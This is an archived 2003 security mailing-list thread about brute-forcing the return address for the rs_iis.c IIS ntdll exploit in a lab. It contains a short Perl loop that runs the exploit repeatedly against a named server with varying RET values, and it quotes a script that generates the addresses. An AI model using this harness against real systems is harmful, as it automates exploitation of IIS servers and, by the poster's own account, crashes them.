I'm no perl expert, but this is what I whipped up for a similar test:

    $myserver = "pvdnet05";
    for ($i = 0; $i < 256; $i++) {
        # walk the high byte of the 16-bit value; "%02x" keeps it two digits
        # (plain "%x" would produce "a04" instead of "0a04" for $i < 16)
        $retcode = sprintf("%02x", $i);
        # low byte is fixed at 04, see the note below
        $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
        system($exec);
        sleep(1);
    }

Note that the last byte of the RET address is not terribly significant, since the NOP sled is ~65K in size and this value is only max 256 bytes significant.

This didn't work well for me, since IIS will sometimes crash without a valid RET address, requiring a server restart. I had meant to look for a way to restart Windows 2000 services from a Linux box with Samba or similar tool, but got bored with it and started trying to exploit something else. :)

-Joshua Wright
Senior Network and Security Architect
Johnson & Wales University
Joshua.Wrightat_private
http://home.jwu.edu/jwright/
pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

> In playing with rs_iis.c (ntdll exploit) in our lab, I've been
> looking for ways to brute force the return address.
>
> I know there's been a shell script (rs_brute.sh) released that
> already does this, but since I've been playing with PERL lately
> (and since this shell script did not exist when I began playing
> with the exploit), I thought I'd take a whack at producing the RET
> addresses (0x0000-0xffff) in a PERL script. I just wanted to get
> your input and see if there is an easier way to do this (using
> PERL, of course). Basically, the goal is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following
>    pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
>
> So far, I can generate the output and print it to stdout. Any tips
> on getting the script to run rs_iis once with each address
> produced by the script? Also, is there a way to produce this output
> without creating an array like this?
>
> #!/usr/bin/perl -w
> @HexD = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
>
> for ($i = 0; $i <= 255; $i += 1) {
>     # emit the byte as two hex digits, twice, giving 0000, 0101, ... ffff
>     # (the format strings contain no conversions, so no extra argument is needed)
>     printf("$HexD[int($i / 16)]$HexD[$i % 16]");
>     printf("$HexD[int($i / 16)]$HexD[$i % 16]\n");
> }
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 10:06:33 PST